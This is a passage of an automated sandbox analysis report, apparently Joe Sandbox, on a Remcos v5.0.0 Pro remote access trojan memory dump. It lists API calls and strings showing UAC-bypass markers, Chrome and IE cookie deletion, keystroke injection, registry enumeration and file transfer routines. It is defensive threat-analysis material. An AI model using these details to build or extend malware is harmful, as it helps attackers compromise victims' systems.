                                    • _free.LIBCMT ref: 004454F4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorLast$_abort_memcmp
                                    • String ID: C
                                    • API String ID: 1679612858-1037565863
                                    • Opcode ID: a8f4e868e6027df86e14abe5e970da0ea11d1bbd4f9432e493711607e9b70df4
                                    • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                                    • Opcode Fuzzy Hash: a8f4e868e6027df86e14abe5e970da0ea11d1bbd4f9432e493711607e9b70df4
                                    • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                                    Function 0041490A Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: tcp$udp
                                    • API String ID: 0-3725065008
                                    • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                    • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                    • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                    • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                    Function 00411CFE Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 206memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                                    • SetLastError.KERNEL32(000000C1,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                                    • GetNativeSystemInfo.KERNEL32(?,?,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
                                    • SetLastError.KERNEL32(0000000E), ref: 00411DC9
                                      • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,00411DE7,?,00000000,00003000,00000040,00000000), ref: 00411CB3
                                    • GetProcessHeap.KERNEL32(00000008,00000040), ref: 00411E10
                                    • HeapAlloc.KERNEL32(00000000), ref: 00411E17
                                    • SetLastError.KERNEL32(0000045A), ref: 00411F2A
                                      • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37), ref: 004120E7
                                      • Part of subcall function 00412077: HeapFree.KERNEL32(00000000), ref: 004120EE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                    • String ID: t^F
                                    • API String ID: 3950776272-389975521
                                    • Opcode ID: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
                                    • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                                    • Opcode Fuzzy Hash: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
                                    • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                                    Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 004018BE
                                    • ExitThread.KERNEL32 ref: 004018F6
                                    • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                    • String ID: PkG$XMG$NG$NG
                                    • API String ID: 1649129571-3151166067
                                    • Opcode ID: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
                                    • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                                    • Opcode Fuzzy Hash: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
                                    • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                                    Function 00407963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
                                    • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                                    • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                      • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                      • Part of subcall function 00404B96: SetEvent.KERNEL32(?), ref: 00404BC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                    • String ID: .part
                                    • API String ID: 1303771098-3499674018
                                    • Opcode ID: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
                                    • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                                    • Opcode Fuzzy Hash: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
                                    • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                                    Function 00419993 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
                                    • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InputSend
                                    • String ID:
                                    • API String ID: 3431551938-0
                                    • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                    • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                                    • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                    • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                                    Function 00447571 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __freea$__alloca_probe_16_free
                                    • String ID: a/p$am/pm$zD
                                    • API String ID: 2936374016-2723203690
                                    • Opcode ID: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
                                    • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                                    • Opcode Fuzzy Hash: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
                                    • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                                    Function 00413A55 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                    • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Enum$InfoQueryValue
                                    • String ID: [regsplt]$xUG$TG
                                    • API String ID: 3554306468-1165877943
                                    • Opcode ID: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
                                    • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                                    • Opcode Fuzzy Hash: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
                                    • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                                    Function 00413D0D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46
                                      • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                      • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEnumInfoOpenQuerysend
                                    • String ID: xUG$NG$NG$TG
                                    • API String ID: 3114080316-2811732169
                                    • Opcode ID: f2e89265f4d2f0cfb10cd8f2c72011435137814bee02f1038c413f2e8c362d66
                                    • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                                    • Opcode Fuzzy Hash: f2e89265f4d2f0cfb10cd8f2c72011435137814bee02f1038c413f2e8c362d66
                                    • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                                    Function 0045112C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F8C8,?,00000000,?,00000001,?,000000FF,00000001,0043F8C8,?), ref: 00451179
                                    • __alloca_probe_16.LIBCMT ref: 004511B1
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451202
                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451214
                                    • __freea.LIBCMT ref: 0045121D
                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                    • String ID: PkGNG
                                    • API String ID: 313313983-263838557
                                    • Opcode ID: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
                                    • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                    • Opcode Fuzzy Hash: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
                                    • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                    Function 0041B68A Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
                                      • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                      • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                    • _wcslen.LIBCMT ref: 0041B763
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                    • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                    • API String ID: 37874593-122982132
                                    • Opcode ID: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
                                    • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                    • Opcode Fuzzy Hash: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
                                    • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                    Function 0040BEE9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                      • Part of subcall function 004135A6: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                      • Part of subcall function 004135A6: RegCloseKey.ADVAPI32(?), ref: 004135F2
                                    • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                                    • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                    • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                    • API String ID: 1133728706-4073444585
                                    • Opcode ID: 246bfe7413cfec2d8385f2843d619168fbbecd56299b2e52a4c2fcf38f83732e
                                    • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                                    • Opcode Fuzzy Hash: 246bfe7413cfec2d8385f2843d619168fbbecd56299b2e52a4c2fcf38f83732e
                                    • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                                    Function 00456B53 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
                                    • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                    • Opcode Fuzzy Hash: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
                                    • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                    Function 00450EFA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                                    • _free.LIBCMT ref: 00450F48
                                      • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • _free.LIBCMT ref: 00450F53
                                    • _free.LIBCMT ref: 00450F5E
                                    • _free.LIBCMT ref: 00450FB2
                                    • _free.LIBCMT ref: 00450FBD
                                    • _free.LIBCMT ref: 00450FC8
                                    • _free.LIBCMT ref: 00450FD3
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                    • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                                    • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                    • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                                    Function 00411163 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                    • int.LIBCPMT ref: 00411183
                                      • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                      • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                    • std::_Facet_Register.LIBCPMT ref: 004111C3
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                    • String ID: (mG
                                    • API String ID: 2536120697-4059303827
                                    • Opcode ID: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                                    • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                    • Opcode Fuzzy Hash: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                                    • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                    Function 0041B2C3 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                      • Part of subcall function 004135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                      • Part of subcall function 004135A6: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                      • Part of subcall function 004135A6: RegCloseKey.ADVAPI32(?), ref: 004135F2
                                    • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCurrentOpenProcessQueryValue
                                    • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                    • API String ID: 1866151309-2070987746
                                    • Opcode ID: 739a84b6b521fba7f3deec685196c40b2f0f20dc19e43594882229fa67cbe478
                                    • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                    • Opcode Fuzzy Hash: 739a84b6b521fba7f3deec685196c40b2f0f20dc19e43594882229fa67cbe478
                                    • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                                    Function 0043A35A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                    • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastValue___vcrt_
                                    • String ID:
                                    • API String ID: 3852720340-0
                                    • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                    • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                    • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                    • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                    Function 004075B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                    Download Yara Rule
                                    APIs
                                    • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe), ref: 004075D0
                                      • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                      • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                    • CoUninitialize.OLE32 ref: 00407629
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: InitializeObjectUninitialize_wcslen
                                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                    • API String ID: 3851391207-3294358829
                                    • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                    • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                    • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                    • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                    Function 0040BAA1 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                    • GetLastError.KERNEL32 ref: 0040BAE7
                                    Strings
                                    • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                    • [Chrome Cookies not found], xrefs: 0040BB01
                                    • UserProfile, xrefs: 0040BAAD
                                    • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteErrorFileLast
                                    • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                    • API String ID: 2018770650-304995407
                                    • Opcode ID: 3ac18cd69eb512cfe3046ffff68c330a49271f1a171cc2acfba67e1dc9669370
                                    • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                    • Opcode Fuzzy Hash: 3ac18cd69eb512cfe3046ffff68c330a49271f1a171cc2acfba67e1dc9669370
                                    • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                    Function 0041CD9B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                    • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                    • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001B.00000002.2003949071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_27_2_400000_RegSvcs.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Console$AllocOutputShowWindow
                                    • String ID: Remcos v$5.0.0 Pro$CONOUT$
                                    • API String ID: 2425139147-2278869229
